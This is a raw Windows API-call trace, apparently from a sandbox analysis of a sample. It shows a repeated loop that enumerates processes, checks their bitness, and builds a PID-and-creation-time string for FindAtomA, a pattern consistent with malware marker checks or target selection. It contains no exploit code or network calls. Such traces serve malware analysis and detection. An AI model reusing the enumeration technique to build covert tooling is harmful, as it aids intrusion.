	[0076.025] CloseHandle (hObject=0x224) returned 1
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.025] CloseHandle (hObject=0x224) returned 1
	[0076.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.026] CloseHandle (hObject=0x224) returned 1
	[0076.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.026] CloseHandle (hObject=0x224) returned 1
	[0076.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.026] CloseHandle (hObject=0x224) returned 1
	[0076.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.026] CloseHandle (hObject=0x224) returned 1
	[0076.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.026] CloseHandle (hObject=0x224) returned 1
	[0076.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.026] CloseHandle (hObject=0x224) returned 1
	[0076.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.027] CloseHandle (hObject=0x224) returned 1
	[0076.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.027] CloseHandle (hObject=0x224) returned 1
	[0076.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.027] CloseHandle (hObject=0x224) returned 1
	[0076.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.027] CloseHandle (hObject=0x224) returned 1
	[0076.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.027] CloseHandle (hObject=0x224) returned 1
	[0076.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.027] CloseHandle (hObject=0x224) returned 1
	[0076.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.027] CloseHandle (hObject=0x224) returned 1
	[0076.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.028] CloseHandle (hObject=0x224) returned 1
	[0076.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.028] CloseHandle (hObject=0x224) returned 1
	[0076.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.028] CloseHandle (hObject=0x224) returned 1
	[0076.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.028] CloseHandle (hObject=0x224) returned 1
	[0076.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.028] CloseHandle (hObject=0x224) returned 1
	[0076.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.028] CloseHandle (hObject=0x224) returned 1
	[0076.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.029] CloseHandle (hObject=0x224) returned 1
	[0076.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.029] CloseHandle (hObject=0x224) returned 1
	[0076.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.029] CloseHandle (hObject=0x224) returned 1
	[0076.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.029] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.029] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.029] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.030] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.030] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.030] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.030] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.030] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.030] CloseHandle (hObject=0x224) returned 1
	[0076.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.030] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.030] CloseHandle (hObject=0x224) returned 1
	[0076.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.030] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.030] CloseHandle (hObject=0x224) returned 1
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.104] CloseHandle (hObject=0x224) returned 1
	[0076.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.105] CloseHandle (hObject=0x224) returned 1
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.105] CloseHandle (hObject=0x224) returned 1
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.105] CloseHandle (hObject=0x224) returned 1
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.105] CloseHandle (hObject=0x224) returned 1
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.105] CloseHandle (hObject=0x224) returned 1
	[0076.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.105] CloseHandle (hObject=0x224) returned 1
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.106] CloseHandle (hObject=0x224) returned 1
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.106] CloseHandle (hObject=0x224) returned 1
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.106] CloseHandle (hObject=0x224) returned 1
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.106] CloseHandle (hObject=0x224) returned 1
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.106] CloseHandle (hObject=0x224) returned 1
	[0076.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.106] CloseHandle (hObject=0x224) returned 1
	[0076.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.107] CloseHandle (hObject=0x224) returned 1
	[0076.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.107] CloseHandle (hObject=0x224) returned 1
	[0076.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.107] CloseHandle (hObject=0x224) returned 1
	[0076.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.107] CloseHandle (hObject=0x224) returned 1
	[0076.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.107] CloseHandle (hObject=0x224) returned 1
	[0076.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.107] CloseHandle (hObject=0x224) returned 1
	[0076.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.108] CloseHandle (hObject=0x224) returned 1
	[0076.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.108] CloseHandle (hObject=0x224) returned 1
	[0076.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.108] CloseHandle (hObject=0x224) returned 1
	[0076.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.108] CloseHandle (hObject=0x224) returned 1
	[0076.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.108] CloseHandle (hObject=0x224) returned 1
	[0076.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.108] CloseHandle (hObject=0x224) returned 1
	[0076.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.108] CloseHandle (hObject=0x224) returned 1
	[0076.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.109] CloseHandle (hObject=0x224) returned 1
	[0076.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.109] CloseHandle (hObject=0x224) returned 1
	[0076.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.109] CloseHandle (hObject=0x224) returned 1
	[0076.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.109] CloseHandle (hObject=0x224) returned 1
	[0076.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.109] CloseHandle (hObject=0x224) returned 1
	[0076.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.109] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.110] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.110] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.110] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.110] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.110] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.110] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.110] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.110] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.110] CloseHandle (hObject=0x224) returned 1
	[0076.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.111] CloseHandle (hObject=0x224) returned 1
	[0076.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.111] CloseHandle (hObject=0x224) returned 1
	[0076.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.191] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.191] CloseHandle (hObject=0x224) returned 1
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.191] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.191] CloseHandle (hObject=0x224) returned 1
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.191] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.191] CloseHandle (hObject=0x224) returned 1
	[0076.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.192] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.192] CloseHandle (hObject=0x224) returned 1
	[0076.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.192] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.192] CloseHandle (hObject=0x224) returned 1
	[0076.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.192] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.192] CloseHandle (hObject=0x224) returned 1
	[0076.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.192] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.192] CloseHandle (hObject=0x224) returned 1
	[0076.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.192] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.192] CloseHandle (hObject=0x224) returned 1
	[0076.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.192] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.192] CloseHandle (hObject=0x224) returned 1
	[0076.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.193] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.193] CloseHandle (hObject=0x224) returned 1
	[0076.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.193] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.193] CloseHandle (hObject=0x224) returned 1
	[0076.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.193] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.193] CloseHandle (hObject=0x224) returned 1
	[0076.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.193] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.193] CloseHandle (hObject=0x224) returned 1
	[0076.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.193] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.193] CloseHandle (hObject=0x224) returned 1
	[0076.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.193] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.193] CloseHandle (hObject=0x224) returned 1
	[0076.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
